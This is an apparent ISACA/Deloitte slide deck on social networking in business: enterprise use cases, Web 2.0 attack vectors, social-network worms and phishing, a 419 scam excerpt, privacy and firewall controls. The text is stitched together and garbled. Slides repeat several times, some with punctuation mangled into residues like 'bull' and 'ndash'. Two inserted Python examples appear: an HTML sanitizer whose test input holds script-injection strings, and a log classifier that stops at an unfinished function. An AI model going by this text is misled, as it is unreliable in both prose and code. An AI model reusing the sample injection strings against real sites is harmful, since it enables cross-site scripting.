bull Details how social networking sites and applications can be usedbull Define consequences for failure to comply eg ldquotermination of employment and
legal actionrdquo
bull Risk assessmentndash Establish what information is most critical to the businessndash Understand how information might become vulnerable and how to protect it
(data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
What's next in the world of social networking

• Increase in the use of mobile devices to access social networks
 – Over 600 million people will use their phone to access social networks by 2013, an increase of more than 400% on the 2009 figure of 140 million (Source — eMarketer)
• Increase in frequency of access
 – Facebook mobile users are 50% more active than other users of the site
• Take your social profile with you as you travel the Web
 – For example — Facebook Connect
• Social networks will become more pervasive — broadcasting your location in geo-networking apps
 – Interaction between devices. For example, your car's navigation system will be able to learn your friend's location and provide directions to them
Some further predictions

• Some quotes on social networks
 – "Probably the greatest transformative force in our generation, absent a major war" — Mark Zuckerberg, Facebook founder
 – "(Twitter is)… Something important that has the potential to change the world, though we have a long way to go" — Biz Stone, Co-founder of Twitter
Q&A
Today's Presenters

Nelson Gibbs
Senior Manager
AERS – Audit & Enterprise Risk Services
Deloitte & Touche LLP
ngibbs@deloitte.com
+1 213 593 4241
Appendix

• Additional resources
 – Gopal, Raj et al. "Web 2.0 reinvents corporate networking", Deloitte Consulting LLP (2008)
 – The Economist — A special report on social networking, "January 30, 2010"
 – Fraser, Matthew; Dutta, Soumitra (2008). Throwing Sheep in the Boardroom: How Online Social Networking Will Transform Your Life, Work and World
 – "Wall of Facebook: The Social Network's Plan to Dominate the Internet — and Keep Google Out" by Fred Vogelstein, Wired Magazine (June 2009)
 – http://www.wired.com/techbiz/it/magazine/17-07/ff_facebookwall
 – "The Future is Social, Not Search, Facebook COO Says" by Ryan Singel, Wired Magazine (October 2009), http://www.wired.com/epicenter/2009/10/facebook-social-2
 – British Computer Society Social Media Web site — http://www.bcs.org/socialmedia
This presentation contains general information only and Deloitte is not, by means of this presentation, rendering accounting, business, financial, investment, legal, tax or other professional advice or services. This presentation is not a substitute for such professional advice or services, nor should it be used as a basis for any decision or action that may affect your business. Before making any decision or taking any action that may affect your business, you should consult a qualified professional advisor.
Deloitte, its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation.
Increase employee productivity and operational efficiencies (cont.)

• Deloitte's DWiki
 – Provides a safe, flexible knowledge creation and information sharing environment for all Deloitte practitioners across country, practice and Deloitte organizational borders
 – Enhances the client service delivery capabilities of our Deloitte practitioners
 – Serves as a test environment for innovative concepts and solutions which expand the business interests of Deloitte

As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
Foster creativity, innovation and collaboration

• Harness product, process and service innovations by unlocking creativity and ideas from any area of the company
• The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
• Employees create unexpected connections with one another and expand their base of knowledge, experience and circle of trusted colleagues

Product innovation
• A leading high-tech manufacturer instituted a "submit-and-vote-for-your-favorite-idea" social community with its consumers, generating over 5,000 ideas and over 300,000 votes in its first three months and subsequently identifying new product offerings

Information capture
• A federal agency created an internal wiki to bolster the capture and dissemination of mission-critical information between field agents
Foster creativity, innovation and collaboration (cont.)

• Best Buy
 – A community of Best Buy employees who convene regularly to share knowledge, best practices, frustrations, aspirations and a few jokes. Community members include everyone from recent high school graduates to semi-retirees
 https://mix.blueshirtnation.com
Foster creativity, innovation and collaboration (cont.)

• Deloitte's DStreet
 – Enterprise talent networking site - changing the way we connect with each other
 – Enables another way of collaboration and community building
 – Network, build new relationships and forge successful careers
 – Learn about colleagues and interesting ways to introduce yourself
 – Identify new connection points to create a basis for meaningful conversation
 – A new way of assembling the right team

As used in this document, "Deloitte" means Deloitte LLP. Please see www.deloitte.com/us/about for a detailed description of the legal structure of Deloitte LLP and its subsidiaries.
Enhance customer and partner relationships

• Opens the lines of communication beyond typical spokespeople such as marketing, sales and PR, and provides an avenue for other important stakeholders (e.g. engineers, scientists, product managers) to gather firsthand feedback from customers
• Allow customers to access help beyond traditional means, with networks that provide peer support and a user-generated knowledgebase, while monitoring customer perception
• Provide a forum for collaborative business development, education and communications with vendors, OEMs and other partners
• Allow consumers who know your products and services best to become a part of the new offering development process

Revenue growth
• A major consumer goods company improved sales by 315 by including customer ratings, user-generated product reviews and other social features on its online storefront, also resulting in a 40% uptick in average order value
Enhance customer and partner relationships (cont.)

• Procter & Gamble
 – Capessa launched in the "Yahoo Health" section of Yahoo.com, one of the world's leading internet destinations. Women who register with Capessa.yahoo.com have access to several topic areas, including parenting, pregnancy, weight loss, relationships, career, healthy living and care giving
 http://realwomenrealadvice.com
Enhance customer and partner relationships (cont.)

• American Express
 – OPEN Forum, an online resource and networking site for business owners. The site is designed to forge meaningful business connections and provide practical, actionable information and insights from influential bloggers, industry leaders and savvy entrepreneurs
 http://www.openforum.com
Enhance customer and partner relationships (cont.)

• State of Louisville, Kentucky
 – Interactive audit findings on Web site. Allows the users to discuss previous audit findings
 http://www.louisvilleky.gov/InternalAudit
Enhance customer and partner relationships (cont.)

• Amazon
 – A social network for people who love books. Users are able to create a virtual shelf to show off their books, see what their friends are reading and discover new books
 http://www.shelfari.com
Enhance customer and partner relationships (cont.)

• Bank of America (BofA)
 – On January 29, 2010, the Bank of America Web site was down. BofA used Twitter to keep in touch with its customers to let them know the latest update
Risks and challenges
Risks and challenges

• Farmers and Mobsters
 – Top Facebook applications
  • Source - http://statistics.allfacebook.com/applications/leaderboard (March 2010)
  • There are now more than 500,000 active applications on the Facebook Platform

Rank  Name                    Monthly Active Users
1     FarmVille               82,580,911
2     Static FBML             46,827,021
3     Birthday Cards          41,904,049
4     Café World              30,032,716
5     Facebook for iPhone     29,438,848
6     Texas HoldEm Poker      28,332,917
7     Slide FunSpace          25,630,033
8     Happy Aquarium (BETA)   24,915,971
9     Mafia Wars              24,704,179
10    Causes                  24,317,292
Risks and challenges (cont.)

• New security concerns and attack vectors — as a result of the shift in technology through Web services that are empowering server-side core technology components, as well as Asynchronous JavaScript and XML ("AJAX") and Rich Internet Application ("RIA") clients that are enhancing client-end interfaces in the browser itself
• Top 10 Web 2.0 attack vectors — http://net-square.com/whitepapers/Top10_Web2.0_AV.pdf
 – Cross-site scripting ("CSS") in AJAX, e.g. "Samy worm that exploited MySpace.com's CSS flaw"
 – XML poisoning — poison XML blocks coming from AJAX client
 – Malicious AJAX code execution — replay of cookies for each request
 – RSS/Atom injection — inject JavaScripts into the RSS feeds to generate attack on client browser
 – Web Services Definition Language ("WSDL") scanning and enumeration
 – Client-side validation in AJAX routines — fail to perform server-side checks
 – Web services routing issues — compromise of intermediate nodes
 – Parameter manipulation with SOAP — web services consume information and variables from SOAP
 – XPATH injection in SOAP message — bypass authentication mechanisms
 – RIA thick client binary manipulation — issues with session management
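The defensive counterpart to the RSS/Atom injection and AJAX cross-site scripting items above is to re-render untrusted feed or AJAX-delivered HTML through an allow-list before it reaches the browser, rather than trusting the feed's markup. The following is an added example, not code from the presentation or the cited whitepaper; the tag and attribute allow-lists and the sample feed item are constructed for the illustration.

```python
"""Allow-list sanitizer for untrusted feed or AJAX-delivered HTML fragments.
Added illustration, not code from the presentation or the cited whitepaper.
The allow-lists and the sample fragment below are constructed for the example."""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "ul", "ol", "li", "br"}
ALLOWED_ATTRS = {"a": {"href", "title"}}  # no event handlers, no style, no src
VOID_TAGS = {"br"}
# Elements whose content is dropped as well; for other unknown tags only the tag goes.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed"}
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")

# Constructed feed item: the kind of markup a poisoned <description> might carry.
SAMPLE_ITEM = ('<p>Quarterly update <b onclick="x()">posted</b>.'
               '<script>injected()</script> Read it '
               '<a href="https://example.com/post?id=1&q=2" title="post">here</a> '
               'or <a href=" JavaScript:x()">here</a>.<img src="x" onerror="y()"></p>')


def _safe_url(value):
    """Accept only absolute http(s)/mailto URLs. Normalize first so that leading
    whitespace, control characters or mixed case in the scheme cannot hide a
    script-scheme URL from the allow-list check."""
    cleaned = "".join(ch for ch in value if ch.isprintable() and not ch.isspace()).lower()
    return cleaned.startswith(SAFE_URL_SCHEMES)


class FeedSanitizer(HTMLParser):
    """Rebuilds the fragment from scratch, emitting only allow-listed markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self._drop_depth = 0  # > 0 while inside <script>, <style>, ...

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._drop_depth += 1
            return
        if self._drop_depth or tag not in ALLOWED_TAGS:
            return  # unknown tag (div, img, ...): drop the tag, keep any text
        kept = []
        for name, value in attrs:
            if value is None or name not in ALLOWED_ATTRS.get(tag, set()):
                continue
            if name == "href" and not _safe_url(value):
                continue
            kept.append(' %s="%s"' % (name, escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._drop_depth = max(0, self._drop_depth - 1)
        elif not self._drop_depth and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._drop_depth:
            self.out.append(escape(data, quote=False))  # text is never emitted raw


def sanitize(fragment):
    """Return the allow-listed re-rendering of an untrusted HTML fragment."""
    parser = FeedSanitizer()
    parser.feed(fragment)
    parser.close()
    return "".join(parser.out)


if __name__ == "__main__":
    print(sanitize(SAMPLE_ITEM))
```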
Risks and challenges (cont.)

• Example worms / phishing attacks affecting social networking sites
 – Koobface – targets Facebook, MySpace, hi5, Bebo, Twitter and other sites. Users are prompted to click on a URL purporting to be an update from Adobe, and a worm is downloaded to the PC which looks for personal data
 – Fbaction - Facebook phishing attack that encourages users to sign up for fbaction.net using their Facebook credentials. Those credentials are then used to hijack the Facebook account
Risks and challenges (cont.)

 – Boface - convinces users to click on a link pointing to a video, resulting in a download. Shortly after the download is complete, the user's Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
• Common element – they all take advantage of the implied trust that social networking users have with each other
Risks and challenges (cont.)

"Has what we've learned about writing software the last 20 years been expressed in the design of Web 2.0? Of course not. It can't even be said to have a design. If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming, Web 2.0 would not be happening." - Marcus Ranum in InfoSec Magazine, May 2008

• Trust — Data reliability commonly causes issues for social media in the workplace. The Web has partially solved this with techniques such as inbound link counting, but reputation and voting systems are starting to appear, often as plug-ins for social media tools
• May also take advantage of URL shortening – bit.ly, tr.im, tinyurl.com, etc.
Risks and challenges (cont.)

• More on phishing — social networks are a target-rich environment
Risks and challenges (cont.)

• More on phishing — social networks are a target-rich environment (cont.)

"Dearest One…
Sorry for the nature of this email, please bear with me.
I am Natasha Kone, a 22 year old lady now. I was born on the 1st of January 1986 to the family of Kone. My father's name is Kamara Cone. He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively. I am their only child. When I was a kid I attended a private school and things were well for me and my parents. Things changed when I was in High School; my mother died on the 21st October 1994. My father then took me very special and gave me motherly care. As fate had it, my father died last year……………" - See http://www.419legal.org for more details

• The 419 scams have evolved with the technology – now using LinkedIn to target specific individuals
Risks and challenges (cont.)

• Reputation — Damage to company brand/reputation through inappropriate comments or remarks from employees
 – Even a lack of a response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account
 – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized
• Copyright violation — Third-party material such as essays, articles and photographs are used without written consent from the proprietor
• Intellectual property theft — Harder to prevent inadvertent data leakage through the one-to-many nature of Web 2.0 as a medium
Risks and challenges (cont.)

• Failures in the use of Social Media — most companies that use Social Media don't approach it the way they would with other mission-critical technology
 – At best, it can be said that most companies today are merely dabbling with Social Media…
 – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues
 – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail

"Fully half of all Social Media investments will fail" — Gartner
Risks and challenges (cont.)

"When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'cookie monster sings chocolate rain' about 1000 times." - Michael Scott from The Office

• Productivity — Users employ social media tools for nonproductive purposes such as socializing ("Social Notworking")
http://news.bbc.co.uk/2/hi/business/8325865.stm
Risks and challenges (cont.)

• Technical integration — Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern
 – Sign in using your account with:
  • Facebook
  • Twitter
  • Myspace
  • Yahoo
  • Google
  • Windows Live ID
  • AOL
  • Blogger
  • WordPress
  • Netlog
  • OpenID
  • flickr
Risks and challenges (cont.)

• Information hoarding — In many industries, value is placed on what an employee knows that others do not know. This belief prevents data sharing
• Quantification — Researchers currently face challenges quantifying social networking benefits
 – Valuation techniques include, among others, Beckstrom's law, which states that — "The value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user, and summed for all"
 Or alternatively:
 – http://en.wikipedia.org/wiki/Beckstrom's_law
Risks and challenges (cont.)

• Litigation issues — Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation issues
A quick word on privacy

"People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time."
— Mark Zuckerberg, Facebook founder

"If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place."
— Eric Schmidt, CEO, Google Inc.
A quick word on privacy (cont.)

• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data in use
• Data remanence: limited attempt to address
Responding to the risks and challenges

• Policies and procedures
 – Acceptable use policy
  • Details how social networking sites and applications can be used
  • Define consequences for failure to comply, e.g. "termination of employment and legal action"
• Risk assessment
 – Establish what information is most critical to the business
 – Understand how information might become vulnerable and how to protect it (data mapping)
wwwisacaorg51
Responding to the risks and challengesResponding to the risks and challenges
bull Education and awarenessndash Inform user of the information security risks involved and how to guard
against thembull For example only install or run applications from trusted sources approved by the
corporate IT department
wwwisacaorg52
Responding to the risks and challenges Responding to the risks and challenges (cont)(cont)
bull Vulnerability Assessmentsndash Identifying quantifying and prioritizing the potential vulnerabilities that Social
Networking may present to the organizationbull Firewalls
ndash Historically firewalls focused on ports IP addresses and packetsndash But social networking applications operate on Ports 80 amp 443ndash Next-generation firewall technology that offers granular control of social
networking functionalitybull Identify applications regardless of port protocol evasive tactic or SSLbull Identify users regardless of IP addressbull Scan application content in real-timebull Visibility and policy control over application access
wwwisacaorg53
What is next in the world of What is next in the world of social networkingsocial networking
wwwisacaorg54
Where we are at todayWhere we are at today
bull Enterprise Social Media has crossed the tipping point and is no longer considered an ldquoemergingrdquo technology
ldquoThe Hype CyclerdquohttpenwikipediaorgwikiHype_cycle
wwwisacaorg55
Whatrsquos next in the world of social Whatrsquos next in the world of social networkingnetworking
bull Increase in the use of mobile devices to access Social Networksndash Over 600 million people will use their phone to access Social Networks by
2013 and increase of more than 400 than 2009 figure of 140 millionSource mdash eMarketer
bull Increase in frequency of accessndash Facebook mobile users are 50 more active than other users of the site
bull Take your social profile with you as you travel the Webndash For example mdash Facebook Connect
bull Social Networks will become more pervasive mdash broadcasting your location in geo-networking appsndash Interaction between devices For example your carrsquos navigation system will
be able to learn your friendrsquos location and provide directions to them
wwwisacaorg56
Some further predictionsSome further predictions
bull Some quotes on social networksndash ldquoProbably the greatest transformative force in our generation absent a major
warrdquo mdash Mark Zuckerberg Facebook founderndash ldquo(Twitter is)hellip Something important that has the potential to change the
world though we have a long way to gordquo mdash Biz Stone Co-founder of Twitter
wwwisacaorg57
QampAQampA
wwwisacaorg58
Todayrsquos PresentersTodayrsquos Presenters
Nelson GibbsSenior ManagerAERS ndash Audit amp Enterprise Risk ServicesDeloitte amp Touche LLPngibbsdeloittecom+1 213 593 4241
wwwisacaorg59
AppendixAppendix
bull Additional resources ndash Gopal Raj et al ldquoWeb 20 reinvents corporate networkingrdquo Deloitte
Consulting LLP (2008)ndash The Economist mdash A special report on social networking ldquoJanuary 30 2010rdquondash Fraser Matthew Dutta Soumitra (2008) Throwing Sheep in the Boardroom
How Online Social Networking Will Transform Your Life Work and Worldndash ldquoWall of Facebook The Social Networks Plan to Dominate the Internetrdquo mdash
and Keep Google Out by Fred Vogelstein Wired Magazine (June 2009)ndash httpwwwwiredcomtechbizitmagazine17-07ff_facebookwallGreatndash ldquoThe Future is Social Not Search Facebook COO Saysrdquo by Ryan Singel
Wired Magazine (October 2009) httpwwwwiredcomepicenter200910facebook-social-2
ndash British Computer Society Social Media Web site mdashhttpwwwbcsorgsocialmedia
wwwisacaorg60
This presentation contains general information only and Deloitte is not by means of this presentation rendering accounting business financial investment legal tax or other professional advice or services This presentation is not a substitute for such professional advice or services nor should it be used as a basis for any decision or action that may affect your business Before making any decision or taking any action that may affect your business you should consult a qualified professional advisor
Deloitte its affiliates and related entities shall not be responsible for any loss sustained by any person who relies on this presentation
wwwisacaorg25
Foster creativity innovation and Foster creativity innovation and collaborationcollaboration
bull Harness product process and service innovations by unlocking creativityand ideas from any area of the company
bull The diverse group feedback inherent in social computing accelerates the problem-solving process and produces better solutions
bull Employees create unexpected connections with one another and expand their base of knowledge experience and circle of trusted colleagues
Product innovationbull A leading high-tech manufacturer instituted a ldquosubmit-and-vote-for-your-favorite-ideardquo
social community with its consumers generating over 5000 ideas and over 300000 votes in its first three months and subsequently identifying new product offerings
Information capturebull A federal agency created an internal wiki to bolster the capture and
dissemination of mission-critical information between field agents
wwwisacaorg26
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Best Buyndash A community of Best Buy employees who convene regularly to share
knowledge best practices frustrations aspirations and a few jokes Community members include everyone from recent high school graduates to semi retireeshttpsmixblueshirtnationcom
wwwisacaorg27
Foster creativity innovation and Foster creativity innovation and collaboration (cont)collaboration (cont)
bull Deloittersquos DStreetndash Enterprise talent networking site - changing the way we connect with each
otherndash Enables another way of collaboration and community buildingndash Network build new relationships and forge successful careersndash Learn about colleagues and interesting ways to introduce yourselfndash Identify new connection points to create a basis for meaningful conversationndash A new way of assembling the right team
As used in this document ldquoDeloitterdquo means Deloitte LLP Please see wwwdeloittecomusabout for a detailed description of the legal structure of Deloitte LLP and its subsidiaries
wwwisacaorg28
Enhance customer and partner Enhance customer and partner relationshipsrelationships
bull Opens the lines of communication beyond typical spokespeople such as marketing sales and PR and provides an avenue for other important stakeholders (eg engineers scientists product managers) to gather firsthand feedback from customers
bull Allow customers to access help beyond traditional means with networks that provide peer support and a user-generated knowledgebase while monitoring customer perception
bull Provide a forum for collaborative business development education and communications with vendors OEMs and other partners
bull Allow consumers who know your products and services best to become a part of the new offering development process
Revenue growthbull A major consumer goods company improved sales by 315 by including
customer ratings user-generated product reviews and other social features on its online storefront also resulting in a 40 uptick in average order value
wwwisacaorg29
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Procter amp Gamblendash Capessa launched in the ldquoYahoo Healthrdquo section of Yahoocom one of the
worlds leading internet destinations Women who register with Capessayahoocom have access to several topic areas including parenting pregnancy weight loss relationships career healthy living and care givinghttprealwomenrealadvicecom
wwwisacaorg30
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull American Expressndash OPEN Forum an online resource and networking site for business owners
The site is designed to forge meaningful business connections and provide practical actionable information and insights from influential bloggers industry leaders and savvy entrepreneurshttpwwwopenforumcom
wwwisacaorg31
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull State of Louisville Kentuckyndash Interactive audit findings on Web site Allows the users to discuss previous
audit findingshttpwwwlouisvillekygovInternalAudit
wwwisacaorg32
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Amazonndash A social network for people who love books Users are able to create a
virtual shelf to show off their books see what their friends are reading and discover new books httpwwwshelfaricom
wwwisacaorg33
Enhance customer and partner Enhance customer and partner relationships (cont)relationships (cont)
bull Bank of America (BofA)ndash On January 29 2010 Bank of America Web site was down BofA used
twitter to keep in touch with its customers to let them know the latest update
wwwisacaorg34
Risks and challengesRisks and challenges
wwwisacaorg35
Risks and challengesRisks and challengesbull Farmers and Mobsters
ndash Top Facebook Applications
bull Source - httpstatisticsallfacebookcomapplicationsleaderboard (March 2010)bull There are now more than 500000 active applications on the Facebook Platform
Rank Name Monthly Active Users
1 FarmVille 82580911
2 Static FBML 46827021
3 Birthday Cards 41904049
4 Cafeacute World 30032716
5 Facebook for iPhone 29438848
6 Texas HoldEm Poker 28332917
7 Slide FunSpace 25630033
8 Happy Aquariam (BETA) 24915971
9 Mafia Wars 24704179
10 Causes 24317292
wwwisacaorg36
bull New security concerns and attack vectors mdash as a result of the shift in technology through Web services that are empowering server-side core technology components as well as Asynchronous JavaScript and XML (ldquoAJAXrdquo) and Rich Internet Application (ldquoRIArdquo) clients that are enhancing client-end interfaces in the browser itself
bull Top 10 Web 20 Attack Vectors mdash httpnet-squarecomwhitepapersTop10_Web20_AVpdfndash Cross-site scripting (ldquoCSSrdquo) in AJAX eg ldquoSamy worm that exploited MySpacecomrsquos CSS flawrdquondash XML poisoning mdash poison XML blocks coming from AJAX clientndash Malicious AJAX code execution mdash replay of cookies for each requestndash RSSAtom injection mdash inject JavaScripts into the RSS feeds to generate attack on client browserndash Web Services Definition Language (ldquoWSDLrdquo) scanning and enumerationndash Client-side validation in AJAX routines mdash fail to perform server-side checksndash Web services routing issues mdash compromise of intermediate nodesndash Parameter manipulation with SOAP mdash web services consume information and variables from SOAPndash XPATH injection in SOAP message mdash bypass authentication mechanismsndash RIA thick client binary manipulation mdash issues with session management
Risks and challenges (cont)Risks and challenges (cont)
wwwisacaorg37
Risks and challenges (cont)Risks and challenges (cont)bull Example worms phishing attacks affecting social networking sites
ndash Koobface ndash targets Facebook MySpace hi5 Bebo Twitter and other sites Users are prompted to click on a URL purporting to be an update from Adobe and a worm is downloaded to the PC which looks for personal data
ndash Fbaction - Facebook phishing attack that encourages users to sign up for fbactionnet using their Facebook credentials Those credentials are then used to hijack the Facebook account
wwwisacaorg38
Risks and challenges (cont)Risks and challenges (cont)
ndash Boface - convinces users to click on a link pointing to a video resulting in a download Shortly after the download is complete the userrsquos Facebook account will be hijacked and used as a means of spamming (and propagating a worm to) all their friends
bull Common element ndash they all take advantage of the implied trust that social networking users have with each other
wwwisacaorg39
Risks and challenges (cont)Risks and challenges (cont)
ldquoHas what weve learned about writing software the last 20 years been expressed in the design of Web 20 Of course not It cant even be said to have a design If showing people what vulnerabilities can do were going to somehow encourage software developers to be more careful about programming Web 20 would not be happeningrdquo - Marcus Ranum in InfoSec Magazine May 2008
bull Trust mdash Data reliability commonly causes issues for social media in the workplace The Web has partially solved this with techniques such as inbound link counting but reputation and voting systems are starting to appear often as plug-ins for social media tools
bull May also take advantage of URL Shortening ndash bitly trim tinyurlcom etc
wwwisacaorg40
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment
wwwisacaorg41
Risks and challenges (cont)Risks and challenges (cont)
bull More on phishing mdash social networks are a target rich environment (cont)
ldquoDearest Onehellip
Sorry for the nature of this email please bear with me
I am Natasha Kone a 22 year old lady now i was born on the 1st of January 1986 to the family of Kone My fatherrsquos name is Kamara Cone He was a very wealthy Gold and Cocoa Merchant based in ACCRA and ABIDJAN respectively I am their only child When I was a kid I attended a private school and things were well for me and my parents Things changed when I was in High School my mother died on the 21st October 1994 My father then took me very special and gave me motherly care As fate had it my father died last yearhelliphelliphelliphelliphelliphelliphelliprdquo- See httpwww419legalorg for more details
bull The 419 scams have evolved with the technology ndash now using LinkedIn to target specific individuals
www.isaca.org 42
Risks and challenges (cont.)
• Reputation — Damage to company brand/reputation through inappropriate comments or remarks from employees
  – Even a lack of response may damage the brand. For example, XYZ Company Inc. creates a Twitter account called XYZ_Cares and then fails to use the account.
  – Other examples include creating a social media program but not telling the rest of the company about it, so they may be unaware of any promotions or offers being publicized.
• Copyright violation — Third-party material such as essays, articles and photographs is used without written consent from the proprietor.
• Intellectual property theft — Inadvertent data leakage is harder to prevent because of the one-to-many nature of Web 2.0 as a medium.
www.isaca.org 43
Risks and challenges (cont.)
• Failures in the use of social media — most companies that use social media don't approach it the way they would any other mission-critical technology
  – At best, it can be said that most companies today are merely dabbling with social media…
  – Few have approached the solution with an integrated strategy or a concrete business case, usually because they either aren't fully convinced of its value or have been slowed by the security and legal issues.
  – Without a strategy and proper metrics based on a business case, their projects will remain small, mismanaged and likely to fail.
“Fully half of all Social Media investments will fail” — Gartner
www.isaca.org 44
Risks and challenges (cont.)
“When I discovered YouTube, I didn't work for five days. I did nothing. I viewed 'cookie monster sings chocolate rain' about 1000 times.” - Michael Scott, from The Office
• Productivity — Users employ social media tools for nonproductive purposes such as socializing (“Social Notworking”)
http://news.bbc.co.uk/2/hi/business/8325865.stm
www.isaca.org 45
Risks and challenges (cont.)
• Technical integration — Most organizations note that integration between individual Web 2.0 applications and their overall infrastructure is a major concern.
  – Sign in using your account with: Facebook, Twitter, Myspace, Yahoo, Google, Windows Live ID, AOL, Blogger, WordPress, Netlog, OpenID, flickr
www.isaca.org 46
Risks and challenges (cont.)
• Information hoarding — In many industries, value is placed on what an employee knows that others do not know. This belief prevents data sharing.
• Quantification — Researchers currently face challenges quantifying social networking benefits
  – Valuation techniques include, among others, Beckstrom's law, which states that — “The value of a network equals the net value of each user's transactions conducted through that network, valued from the perspective of each user and summed for all.”
  Or, alternatively:
  – http://en.wikipedia.org/wiki/Beckstrom's_law
www.isaca.org 47
Risks and challenges (cont.)
• Litigation issues — Discrimination, defamation, violation of privacy and harassment are some of the potential concerns that might result in litigation.
www.isaca.org 48
A quick word on privacy
“People have really gotten comfortable not only sharing more information and different kinds, but more openly and with more people. That social norm is just something that has evolved over time.”
— Mark Zuckerberg, Facebook founder
“If you have something that you don't want anyone to know, maybe you shouldn't be doing it in the first place.”
— Eric Schmidt, CEO, Google Inc.
www.isaca.org 49
A quick word on privacy (cont.)
• Loss of Fourth Amendment protection
• Encryption of data storage unlikely
• Lack of encryption while data is in use
• Data remanence – limited attempt to address
www.isaca.org 50
Responding to the risks and challenges
• Policies and procedures
  – Acceptable use policy
    • Details how social networking sites and applications can be used
    • Define consequences for failure to comply, e.g. “termination of employment and legal action”
• Risk assessment
  – Establish what information is most critical to the business
  – Understand how information might become vulnerable and how to protect it (data mapping)
www.isaca.org 51
Responding to the risks and challenges
• Education and awareness
  – Inform users of the information security risks involved and how to guard against them
    • For example, only install or run applications from trusted sources approved by the corporate IT department
www.isaca.org 52
Responding to the risks and challenges (cont.)
• Vulnerability assessments
  – Identifying, quantifying and prioritizing the potential vulnerabilities that social networking may present to the organization
• Firewalls
  – Historically, firewalls focused on ports, IP addresses and packets
  – But social networking applications operate on ports 80 & 443, the same ports as ordinary web traffic, so port-based rules cannot single them out
  – Next-generation firewall technology offers granular control of social networking functionality:
    • Identify applications regardless of port, protocol, evasive tactic or SSL
    • Identify users regardless of IP address
    • Scan application content in real time
    • Visibility and policy control over application access
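The firewall points above (social applications run over ports 80 and 443, so they have to be identified by application and host name rather than by port) and the earlier note that phishing links hide behind URL shorteners can both be checked against a web proxy log. The Python below is an added example, not code from the presentation or from any firewall vendor; the log format, the sample log lines, the domain category lists and the rule that a Facebook app is named by the first path segment are all constructed for this example.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample proxy log (not from the presentation). One request per line:
#   <timestamp> <user> <destination host>:<port> <method> <url>
SAMPLE_LOG = """\
2010-03-01T09:01:02 alice www.facebook.com:443 GET https://www.facebook.com/home.php
2010-03-01T09:01:05 alice apps.facebook.com:443 POST https://apps.facebook.com/farmville/harvest
2010-03-01T09:02:10 bob bit.ly:80 GET http://bit.ly/abc123
2010-03-01T09:02:11 bob tinyurl.com:443 GET https://tinyurl.com/xyz
2010-03-01T09:03:00 carol intranet.example.com:443 GET https://intranet.example.com/
2010-03-01T09:04:00 bob twitter.com:8443 GET https://twitter.com:8443/
2010-03-01T09:05:00 dave notfacebook.com:443 GET https://notfacebook.com/
"""

# Assumed category lists; a real deployment would take these from the
# firewall or proxy vendor's application categories.
SOCIAL_DOMAINS = {"facebook.com", "twitter.com", "myspace.com", "linkedin.com"}
SHORTENER_DOMAINS = {"bit.ly", "tr.im", "tinyurl.com"}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<user>\S+) (?P<host>[^:\s]+):(?P<port>\d+) (?P<method>\S+) (?P<url>\S+)$"
)


def parse_line(line):
    """Return a dict for one log line, or None for lines that do not match the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["port"] = int(entry["port"])
    entry["host"] = entry["host"].lower()
    return entry


def domain_matches(host, domains):
    """True if host equals one of the domains or is a subdomain of it.
    Matching on label boundaries keeps 'notfacebook.com' from matching 'facebook.com'."""
    return any(host == d or host.endswith("." + d) for d in domains)


def classify(entry):
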